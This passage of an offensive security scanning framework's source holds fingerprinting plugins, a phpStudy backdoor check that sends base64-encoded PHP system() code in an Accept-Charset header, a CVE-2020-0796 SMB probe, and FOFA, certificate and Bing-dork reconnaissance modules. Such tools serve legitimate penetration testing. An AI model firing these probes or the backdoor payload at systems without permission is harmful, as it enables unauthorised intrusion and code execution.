/Plugins/Vul/Web/__Realor.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import threading
3 | from termcolor import cprint
4 | from tqdm import *
5 | from colorama import Fore
6 |
7 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar shifts down one line.
8 | # Likely-vulnerable findings need red; printing with tqdm.write(Fore.RED + url) gives colored output.
9 | # Errors should be printed in grey with tqdm.write(Fore.WHITE + url)
10 | # Vulnerability results are printed with tqdm.write(Fore.BLACK + url)
11 |
12 |
13 | # Weak credentials here allow logging in to the server
14 | class Detect(threading.Thread):
15 | name = 'Realor'
16 |
17 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
18 | threading.Thread.__init__(self)
19 | self.alive_Web_queue = alive_Web_queue # queue of live web targets
20 | self.pbar = pbar # progress bar
21 | self.vul_list = vul_list # stores the vulnerability names and urls
22 | self.proxies = requests_proxies # proxies
23 | self.headers = {
24 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
25 |
26 | def run(self):
27 | while not self.alive_Web_queue.empty():
28 | alive_web = self.alive_Web_queue.get()
29 | self.pbar.set_postfix(url=alive_web, vul=self.name) # progress bar display
30 | self.run_detect(alive_web.rstrip('/'))
31 | self.pbar.update(1) # advance the progress bar by one for each finished task
32 | self.alive_Web_queue.task_done()
33 |
34 | # Only the code below needs to be changed
35 | def run_detect(self, url):
36 | try:
37 | res = requests.get(url=url, headers=self.headers, proxies=self.proxies, timeout=10)
38 | if 'realor' in res.text:
39 | tqdm.write(Fore.RED + '[Realor] {}'.format(url))
40 | self.vul_list.append(['Realor', url, 'Maybe'])
41 | else:
42 | pass
43 | # print('[phpstudy -] {}'.format(url))
44 | except Exception as e:
45 | pass
46 | # print('[phpstudy error] {}: {}'.format(url, e.args))
47 |
48 |
49 | if __name__ == '__main__':
50 | from queue import Queue
51 |
52 | alive_web = ['']
53 | vul_list = []
54 | # proxy = r''
55 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
56 | requests_proxies = None
57 | alive_Web_queue = Queue(-1) # put the live web targets into the queue
58 | for _ in alive_web:
59 | alive_Web_queue.put(_)
60 |
61 | threads = []
62 | thread_num = 1 # number of vulnerability-detection threads
63 |
64 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测漏洞", ncols=150) # total is the overall count
65 |
66 | for num in range(1, thread_num + 1):
67 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # instantiate the detection class, passing the queue of live webs and the list that stores vulnerabilities
68 | threads.append(t)
69 | t.start()
70 | for t in threads:
71 | t.join()
72 |
73 | tqdm.write(Fore.BLACK + '-'*50 + '结果' + '-'*50)
74 | for vul in vul_list:
75 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/Web/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Web/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/Web/cmspro.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | import hashlib
6 | from tqdm import *
7 | from colorama import Fore
8 |
9 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar shifts down one line.
10 | # Likely-vulnerable findings need red; printing with tqdm.write(Fore.RED + url) gives colored output.
11 | # Errors should be printed in grey with tqdm.write(Fore.WHITE + url)
12 | # Vulnerability results are printed with tqdm.write(Fore.BLACK + url)
13 |
14 |
15 | # CMSPRO
16 | class Detect(threading.Thread):
17 | name = 'CMSPRO'
18 |
19 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
20 | threading.Thread.__init__(self)
21 | self.alive_Web_queue = alive_Web_queue # queue of live web targets
22 | self.pbar = pbar # progress bar
23 | self.vul_list = vul_list # stores the vulnerability names and urls
24 | self.proxies = requests_proxies # proxies
25 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
26 |
27 | def run(self):
28 | while not self.alive_Web_queue.empty():
29 | alive_web = self.alive_Web_queue.get()
30 | self.pbar.set_postfix(url=alive_web, vul=self.name) # progress bar display
31 | self.run_detect(alive_web.rstrip('/'))
32 | self.pbar.update(1) # advance the progress bar by one for each finished task
33 | self.alive_Web_queue.task_done()
34 |
35 | # Invoke the individual vulnerability checks
36 | def run_detect(self, url):
37 | # upload
38 | pass
39 |
40 |
41 | if __name__ == '__main__':
42 | from queue import Queue
43 |
44 | alive_web = ['']
45 | vul_list = []
46 | proxy = r''
47 | requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
48 | # requests_proxies = None
49 | alive_Web_queue = Queue(-1) # put the live web targets into the queue
50 | for _ in alive_web:
51 | alive_Web_queue.put(_)
52 |
53 | threads = []
54 | thread_num = 1 # number of vulnerability-detection threads
55 |
56 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测漏洞", ncols=150) # total is the overall count
57 |
58 | for num in range(1, thread_num + 1):
59 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # instantiate the detection class, passing the queue of live webs and the list that stores vulnerabilities
60 | threads.append(t)
61 | t.start()
62 | for t in threads:
63 | t.join()
64 |
65 | tqdm.write(Fore.BLACK + '-'*50 + '结果' + '-'*50)
66 | for vul in vul_list:
67 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/Web/iOffice.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar moves down one line.
9 | # Possible vulnerabilities should be red: print with tqdm.write(Fore.RED + url)
10 | # Errors should be grey: print with tqdm.write(Fore.WHITE + url)
11 | # Vulnerability results: print with tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # Hongfan iOffice OA
15 | class Detect(threading.Thread):
16 | name = 'iOffice'
17 |
18 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.alive_Web_queue = alive_Web_queue # queue of alive web targets
21 | self.pbar = pbar # progress bar
22 | self.vul_list = vul_list # stores vulnerability names and URLs
23 | self.proxies = requests_proxies # requests proxies
24 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
25 |
26 | def run(self):
27 | while not self.alive_Web_queue.empty():
28 | alive_web = self.alive_Web_queue.get()
29 | self.pbar.set_postfix(url=alive_web, vul=self.name) # update the progress bar display
30 | self.run_detect(alive_web.rstrip('/'))
31 | self.pbar.update(1) # advance the progress bar by 1 for each finished task
32 | self.alive_Web_queue.task_done()
33 |
34 |
35 | # Call the individual vulnerability checks
36 | def run_detect(self, url):
37 | iOffice_url = url + '/ioffice'
38 | try:
39 | res = requests.get(url=iOffice_url, headers=self.headers, proxies=self.proxies, verify=False, timeout=10)
40 | if res.status_code == 200 and 'iOffice.net' in res.text:
41 | tqdm.write(Fore.RED + '[iOffice] {}'.format(url))
42 | self.vul_list.append(['iOffice', url, 'Maybe'])
43 | except Exception as e:
44 | return False
45 |
46 | if __name__ == '__main__':
47 | from queue import Queue
48 |
49 | alive_web = ['']
50 | vul_list = []
51 | # proxy = r''
52 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
53 | requests_proxies = None
54 | alive_Web_queue = Queue(-1) # queue holding the alive web targets
55 | for _ in alive_web:
56 | alive_Web_queue.put(_)
57 |
58 | threads = []
59 | thread_num = 1 # number of vulnerability-detection threads
60 |
61 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="Detecting vulns", ncols=150) # total is the number of tasks
62 |
63 | for num in range(1, thread_num + 1):
64 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # instantiate the detection class with the alive-web queue and the vulnerability list
65 | threads.append(t)
66 | t.start()
67 | for t in threads:
68 | t.join()
69 |
70 | tqdm.write(Fore.BLACK + '-'*50 + 'Results' + '-'*50)
71 | for vul in vul_list:
72 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/Web/phpstudy.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import threading
3 | from termcolor import cprint
4 | from tqdm import *
5 | from colorama import Fore
6 |
7 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar moves down one line.
8 | # Possible vulnerabilities should be red: print with tqdm.write(Fore.RED + url)
9 | # Errors should be grey: print with tqdm.write(Fore.WHITE + url)
10 | # Vulnerability results: print with tqdm.write(Fore.BLACK + url)
11 |
12 |
13 | class Detect(threading.Thread):
14 | name = 'phpstudy'
15 |
16 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
17 | threading.Thread.__init__(self)
18 | self.alive_Web_queue = alive_Web_queue # queue of alive web targets
19 | self.pbar = pbar # progress bar
20 | self.vul_list = vul_list # stores vulnerability names and URLs
21 | self.proxies = requests_proxies # requests proxies
22 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
23 |
24 | def run(self):
25 | while not self.alive_Web_queue.empty():
26 | alive_web = self.alive_Web_queue.get()
27 | self.pbar.set_postfix(url=alive_web, vul=self.name) # update the progress bar display
28 | self.run_detect(alive_web.rstrip('/'))
29 | self.pbar.update(1) # advance the progress bar by 1 for each finished task
30 | self.alive_Web_queue.task_done()
31 |
32 | # Only the detection logic below needs to be modified
33 | def run_detect(self, url):
34 | headers = {'Accept-Encoding': 'gzip,deflate',
35 | 'Accept-Charset': 'c3lzdGVtKCdlY2hvIDExMTFhYWFhMTExMScpOw=='} # base64 of system('echo 1111aaaa1111'); the phpStudy backdoor executes the PHP sent in this header
36 | try:
37 | res = requests.get(url=url, headers=headers, allow_redirects=False, proxies=self.proxies, timeout=10)
38 | if '1111aaaa1111' in res.text:
39 | tqdm.write(Fore.RED + '[phpstudy] {}'.format(url))
40 | self.vul_list.append(['phpstudy', url, 'YES'])
41 | else:
42 | pass
43 | # print('[phpstudy -] {}'.format(url))
44 | except Exception as e:
45 | pass
46 | # print('[phpstudy error] {}: {}'.format(url, e.args))
47 |
48 | if __name__ == '__main__':
49 | from queue import Queue
50 |
51 | alive_web = ['']
52 | vul_list = []
53 | proxy = r''
54 | requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
55 | # requests_proxies = None
56 | alive_Web_queue = Queue(-1) # queue holding the alive web targets
57 | for _ in alive_web:
58 | alive_Web_queue.put(_)
59 |
60 | threads = []
61 | thread_num = 1 # number of vulnerability-detection threads
62 |
63 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="Detecting vulns", ncols=150) # total is the number of tasks
64 |
65 | for num in range(1, thread_num + 1):
66 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # instantiate the detection class with the alive-web queue and the vulnerability list
67 | threads.append(t)
68 | t.start()
69 | for t in threads:
70 | t.join()
71 |
72 | tqdm.write(Fore.BLACK + '-'*50 + 'Results' + '-'*50)
73 | for vul in vul_list:
74 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/Win/CVE_2020_0796.py:
--------------------------------------------------------------------------------
1 | import threading
2 | from termcolor import cprint
3 | import socket
4 | import struct
5 | import socks
6 | from queue import Queue
7 |
8 | pkt = b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
9 |
10 | class Detect(threading.Thread):
11 | name = 'CVE-2020-0796'
12 |
13 | def __init__(self, alive_host_queue, vul_list, proxy):
14 | threading.Thread.__init__(self)
15 | self.alive_host_queue = alive_host_queue # queue of alive hosts
16 | self.vul_list = vul_list # stores vulnerability names and targets
17 | self.setProxy(proxy)
18 |
19 | def setProxy(self, proxy):
20 | if proxy:
21 | socks.set_default_proxy(socks.SOCKS5, proxy.split(':')[0], int(proxy.split(':')[1])) # set the SOCKS5 proxy
22 | socket.socket = socks.socksocket # required, otherwise traffic does not go through the proxy
23 | socket.setdefaulttimeout(0.01) # 0.01 works well here
24 |
25 | def run(self):
26 | while not self.alive_host_queue.empty():
27 | alive_host = self.alive_host_queue.get() # 127.0.0.1
28 | self.run_detect(alive_host)
29 |
30 | # Only the detection logic below needs to be modified
31 | def run_detect(self, ip):
32 | sock = socket.socket(socket.AF_INET)
33 | sock.settimeout(3)
34 |
35 | try:
36 | sock.connect((str(ip), 445))
37 | sock.send(pkt)
38 |
39 | nb, = struct.unpack(">I", sock.recv(4))
40 | res = sock.recv(nb)
41 |
42 | if res[68:70] != b"\x11\x03" or res[70:72] != b"\x02\x00": # anything other than SMB 3.1.1 with compression is treated as not vulnerable
43 | pass
44 | else:
45 | cprint('[CVE-2020-0796] {}'.format(ip), 'red')
46 | self.vul_list.append(['CVE-2020-0796', ip, 'Yes'])
47 | except:
48 | sock.close()
49 |
50 |
51 |
52 | if __name__ == '__main__':
53 | from queue import Queue
54 | alive_host = ['192.168.168.148']
55 | vul_list = []
56 | proxy = "1.1.1.1:1111"
57 |
58 |
59 | alive_host_queue = Queue(-1) # queue holding the alive hosts
60 | for _ in alive_host:
61 | alive_host_queue.put(_)
62 |
63 | threads = []
64 | thread_num = 1 # number of vulnerability-detection threads
65 | for num in range(1, thread_num + 1):
66 | t = Detect(alive_host_queue, vul_list, proxy) # instantiate the detection class with the alive-host queue and the vulnerability list
67 | threads.append(t)
68 | t.start()
69 | for t in threads:
70 | t.join()
71 |
72 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Win/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Win/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/__init__.py
--------------------------------------------------------------------------------
/Plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/Intranet/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/Intranet/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/Intranet/scanPort/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/Intranet/scanPort/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/ParamSpider/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/ParamSpider/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/SocksProxy/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/SocksProxy/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/WebspaceSearchEngine/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/WebspaceSearchEngine/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/WebspaceSearchEngine/fofaApi.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import base64
3 | import json
4 | import configparser
5 |
6 |
7 | # Domain query syntax: domain="xxx.com"
8 | # C-subnet query syntax: ip="xxx.xxx.xxx.0/24"
9 | # query = r'domain="xxx.com"'
10 | # query = r'ip="xxx.xxx.xxx.0/24"'
11 |
12 | cf = configparser.ConfigParser()
13 | cf.read("./iniFile/config.ini")
14 | secs = cf.sections()
15 | email = cf.get('fofa api', 'EMAIL')
16 | key = cf.get('fofa api', 'KEY')
17 |
18 | headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
19 |
20 | size = 10000
21 | page = 1
22 |
23 | def query_ip(c_subnet):
24 | print('[fofa] query: {}'.format(c_subnet))
25 | return query(c_subnet)
26 |
27 | def query_domain(query_str):
28 | print('[fofa] query: {}'.format(query_str))
29 | return query(query_str)
30 |
31 | # Filter out hosts exposing web services
32 | def filter_web(result):
33 |
34 | host, title, ip, domain, port, server, protocol, address = result
35 |
36 | # return the ip and port of hosts exposing an http service
37 | if 'http' in protocol or protocol == '':
38 | web_host_port = '{}'.format(host) # web service; host is IP:PORT (or a domain)
39 | return True, web_host_port
40 | else: # other, non-web services
41 | return False, [protocol, ip, int(port)]
42 |
43 |
44 | def query(query_str):
45 | fofa_web_host_port = [] # hosts exposing web services (ip/domain and port), used later for CMS fingerprinting
46 | fofa_service_host_port = [] # non-web services (ip/domain and port), used later for unauthorized-access checks
47 |
48 | qbase64 = str(base64.b64encode(query_str.encode(encoding='utf-8')), 'utf-8')
49 | url = r'https://fofa.info/api/v1/search/all?email={}&key={}&qbase64={}&size={}&page={}&fields=host,title,ip,domain,port,server,protocol,city'.format(email, key, qbase64, size, page)
50 | try:
51 | ret = json.loads(requests.get(url=url, headers=headers, timeout=10, verify=False).text)
52 | fofa_Results = ret['results']
53 | for result in fofa_Results:
54 | isWeb, host_port = filter_web(result)
55 | if isWeb:
56 | fofa_web_host_port.append(host_port)
57 | else:
58 | fofa_service_host_port.append(host_port)
59 | return fofa_Results, fofa_web_host_port, fofa_service_host_port
60 |
61 | except Exception as e:
62 | print('[error] fofa query {} : {}'.format(query_str, e.args))
63 | return [], [], []
64 |
65 |
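66 | # Illustrative usage sketch (assumes valid FOFA credentials in ./iniFile/config.ini; example.com is a placeholder):
67 | # fofa_results, fofa_web_host_port, fofa_service_host_port = query_domain(r'domain="example.com"')
68 | # print(len(fofa_web_host_port), 'web services,', len(fofa_service_host_port), 'other services')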
--------------------------------------------------------------------------------
/Plugins/infoGather/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Aiqicha/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Aiqicha/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/CDN/GeoLite2-ASN.mmdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/CDN/GeoLite2-ASN.mmdb
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/CDN/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/CDN/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/CSubnet/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/CSubnet/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/CSubnet/demo.py:
--------------------------------------------------------------------------------
1 |
2 | def filter_internal_ip(ip_subnet):
3 | ip_subnet_list = ip_subnet.split('.')
4 | if ip_subnet_list[0] in ('10', '127'): # a bare "or '127'" is always truthy, so use a membership test
5 | return None
6 | elif ip_subnet_list[0] == '172' and 15 < int(ip_subnet_list[1]) < 32:
7 | return None
8 | elif ip_subnet_list[0] == '192' and ip_subnet_list[1] == '168':
9 | return None
10 | else:
11 | return ip_subnet
12 |
13 |
14 | for _ in ['10.0.0', '1.1.1', '192.168', '172.16.1', '172.14.2']:
15 | ip_subnet = filter_internal_ip(_)
16 | print(ip_subnet)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Certs/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Certs/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Certs/crawlCerts.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import ssl
3 | from queue import Queue
4 | from threading import Thread
5 |
6 | # Fetch the certificate SAN (dns) entries of https hosts
7 | class crawlCerts:
8 | def __init__(self, domain, subdomains):
9 | self.domain = domain
10 | self._domain = domain.split('.')[0]
11 | self.newDomains = []
12 | self.subdomains = subdomains
13 | self.subdomains_Queue = Queue(-1)
14 | self.TIMEOUT = 10 # socket timeout
15 | self.threadsNum = 20
16 | self.threads = [] # holds the worker threads
17 |
18 | self.cacert_path = r'./Plugins/infoGather/subdomain/Certs/cacert.pem'
19 | # self.cacert_path = r'../../../../Plugins/infoGather/subdomain/Certs/cacert.pem' # for local testing
20 | self.certsSubdomains = [] # collected subdomains
21 | self.trustedDomainDict = {} # key: subdomain, value: list of SAN entries from its certificate
22 |
23 | def run(self):
24 | for _ in self.subdomains:
25 | self.subdomains_Queue.put(_)
26 |
27 | for i in range(1, self.threadsNum + 1):
28 | t = Thread(target=self.craw_certs)
29 | self.threads.append(t)
30 | t.start()
31 | for t in self.threads:
32 | t.join()
33 |
34 | return list(set(self.certsSubdomains)), self.trustedDomainDict, list(set(self.newDomains))
35 |
36 | def craw_certs(self):
37 | while not self.subdomains_Queue.empty():
38 | subdomain = self.subdomains_Queue.get()
39 | print('req certs -> {}'.format(subdomain))
40 | try:
41 | s = socket.socket()
42 | s.settimeout(self.TIMEOUT)
43 | c = ssl.wrap_socket(s, cert_reqs=ssl.CERT_REQUIRED, ca_certs=self.cacert_path)
44 | c.settimeout(10)
45 | c.connect((subdomain, 443))
46 | cert = c.getpeercert()
47 | dns_domains = [each[1] for each in cert['subjectAltName']]
48 | for trustedDomain in dns_domains:
49 | print("[{}] Found Trusted Domains [{}]".format(subdomain, trustedDomain))
50 | if self._domain in trustedDomain:
51 | self.certsSubdomains.append(trustedDomain.strip('*.'))
52 | if '.{}'.format(self.domain) not in trustedDomain:
53 | self.newDomains.append(trustedDomain.strip('*.'))
54 | self.trustedDomainDict[subdomain] = dns_domains
55 |
56 | except Exception as e:
57 | pass
58 | # print(e.args)
59 | #print(" [-] %s" % (subdomain))
60 |
61 |
62 | if __name__ == '__main__':
63 | domain = ''
64 | subdomains = ['']
65 | certsSubdomains, trustedDomainDict, newDomains = crawlCerts(domain, subdomains).run()
66 | print(certsSubdomains)
67 | print(trustedDomainDict)
68 | print(newDomains)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/FriendChins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/FriendChins/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Baidu/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Spider/Baidu/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Bing/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Spider/Bing/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Bing/bing.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import re
3 | from urllib.parse import quote, urlparse
4 | import threading
5 | from queue import Queue
6 | from IPy import IP
7 | from bs4 import BeautifulSoup
8 |
9 | # Bing spider
10 | class BingSpider:
11 | def __init__(self):
12 | self.headers = {
13 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
14 | # site:domain inurl:admin inurl:login inurl:system 后台 系统
15 | self.wds = ['admin', 'login', 'system', 'register', 'upload', '后台', '系统', '登录']
16 | self.PAGES = 5 # crawl 5 pages per keyword by default
17 | # print('Please wait a few time ...')
18 | self.TIMEOUT = 10
19 | self.bingSubdomains = []
20 | self.links = []
21 | def get_subdomain(self, host, each_wd, i): # host can be either a domain or an IP
22 | for page in range(1, self.PAGES + 1):
23 | q = 'site:{} {}'.format(host, each_wd)
24 | print('[{}] -> [page: {}]'.format(q, page))
25 | tmp = page - 2
26 | if tmp == -1:
27 | first_value = 1
28 | elif tmp == 0:
29 | first_value = 2
30 | else:
31 | first_value = tmp * 10 + 2
32 | url = r'https://www.bing.com/search?q={}&first={}'.format(quote(q), first_value)
33 | print(url)
34 | try:
35 | res = requests.get(url=url, headers=self.headers, timeout=10)
36 | soup = BeautifulSoup(res.text, 'html.parser')
37 | lis = soup.find_all('li', class_='b_algo')
38 | for li in lis:
39 | li_a = li.find('a')
40 | link = li_a['href'] # result link
41 | title = li_a.get_text() # result title
42 | subdomain = urlparse(link).netloc # subdomain
43 | print('[{}] [page: {}]: {} {} {}'.format(q, page, link, title, subdomain))
44 | self.bingSubdomains.append(subdomain)
45 | self.links.append([each_wd, link, title])
46 | except Exception as e:
47 | print(e.args)
48 | # pass
49 | # crawl subdomains
50 | def run_subdomain(self, domain):
51 | threads = []
52 | for i in range(len(self.wds)):
53 | t = threading.Thread(target=self.get_subdomain, args=(domain, self.wds[i], i))
54 | threads.append(t)
55 | t.start()
56 | for t in threads:
57 | t.join()
58 |
59 | return list(set(self.bingSubdomains)), self.links
60 |
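61 | # Illustrative usage sketch (example.com is a placeholder target):
62 | # bingSubdomains, links = BingSpider().run_subdomain('example.com')
63 | # print(bingSubdomains)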
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/.google-cookie:
--------------------------------------------------------------------------------
1 | #LWP-Cookies-2.0
2 | Set-Cookie3: 1P_JAR="2018-12-22-18"; path="/"; domain=".google.com"; path_spec; domain_dot; expires="2019-01-21 18:25:18Z"; version=0
3 | Set-Cookie3: NID="150=A24IhlWFjJMC6YrDdWBm7lUzkeFRQP9XZyslXht-_MAATs-ObZNNNAeI7BTsTtrLA57lsPgNaTqhME6FZXF5S2eaN-wdcQVmx8w0jH26st6IGsYtLcd9x-f9CGr7z7Pii0vY1p6tuO6dD-uFvAvwzqvqankbun2icE5oZ7ogQfM"; path="/"; domain=".google.com"; path_spec; domain_dot; expires="2019-06-19 12:27:28Z"; HttpOnly=None; version=0
4 | Set-Cookie3: CGIC=""; path="/complete/search"; domain=".google.com"; path_spec; domain_dot; expires="2019-06-19 03:22:04Z"; HttpOnly=None; version=0
5 | Set-Cookie3: CGIC=""; path="/search"; domain=".google.com"; path_spec; domain_dot; expires="2019-06-19 03:22:04Z"; HttpOnly=None; version=0
6 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/.travis.yml:
--------------------------------------------------------------------------------
1 | language: python
2 |
3 | # Supported CPython versions:
4 | # https://en.wikipedia.org/wiki/CPython#Version_history
5 | python:
6 | - pypy3
7 | - pypy
8 | - 2.7
9 | - 3.6
10 | - 3.5
11 | - 3.4
12 |
13 | # Use container-based infrastructure
14 | sudo: false
15 |
16 | install:
17 | - pip install pycodestyle pyflakes
18 |
19 | script:
20 | # Static analysis
21 | - pyflakes .
22 | - pycodestyle --statistics --count .
23 |
24 | matrix:
25 | fast_finish: true
26 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/demo.py:
--------------------------------------------------------------------------------
1 | from googlesearch import search
2 | import sys
3 | from sys import version_info
4 |
5 | PY2, PY3 = (True, False) if version_info[0] == 2 else (False, True)
6 |
7 | if PY2:
